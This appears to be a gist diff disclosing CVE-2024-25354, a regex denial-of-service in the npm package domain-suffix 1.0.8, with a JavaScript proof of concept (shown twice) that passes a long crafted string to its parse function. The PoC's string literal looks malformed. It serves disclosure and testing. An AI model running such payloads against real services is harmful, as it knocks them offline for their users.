6en6ar · March 20, 2024 07:41
diff --git a/gistfile1.txt b/gistfile1.txt
 Product: https://www.npmjs.com/package/domain-suffix
 Version: 1.0.8
 Vulnerability type: Denial of Service
 CVE ID: CVE-2024-25354

 The regex defined on line 28. inside https://github.com/ikrong/domain-suffix/blob/master/src/domainSuffix.ts 
 is vulnerable to Regex Denial of Service. When a long string is provided to the application without specifying "/" character 
 the function parse will be stuck for indefinite amount of time,  in this case 10 seconds, but this can be 
 amplified if more characters are added. 
 PoC code:

 const DomainSuffix = require("domain-suffix").domainSuffix;
 console.time('[ + ] Time passed -> ');

 var payload = "aA".repeat(95500) + '/Aa\';
 let result = DomainSuffix.parse("https://" + payload)
 if(result){
 let {suffix,domain} = result;
 console.log(suffix,domain);
 }else{
 console.log("cannot parse");
 }

 console.timeEnd('[ + ] Time passed -> ');
	Product: https://www.npmjs.com/package/domain-suffix
	Version: 1.0.8
	Vulnerability type: Denial of Service
	CVE ID: CVE-2024-25354

	The regex defined on line 28. inside https://github.com/ikrong/domain-suffix/blob/master/src/domainSuffix.ts
	is vulnerable to Regex Denial of Service. When a long string is provided to the application without specifying "/" character
	the function parse will be stuck for indefinite amount of time, in this case 10 seconds, but this can be
	amplified if more characters are added.
	PoC code:

	const DomainSuffix = require("domain-suffix").domainSuffix;
	console.time('[ + ] Time passed -> ');

	var payload = "aA".repeat(95500) + '/Aa\';
	let result = DomainSuffix.parse("https://" + payload)
	if(result){
	let {suffix,domain} = result;
	console.log(suffix,domain);
	}else{
	console.log("cannot parse");
	}

	console.timeEnd('[ + ] Time passed -> ');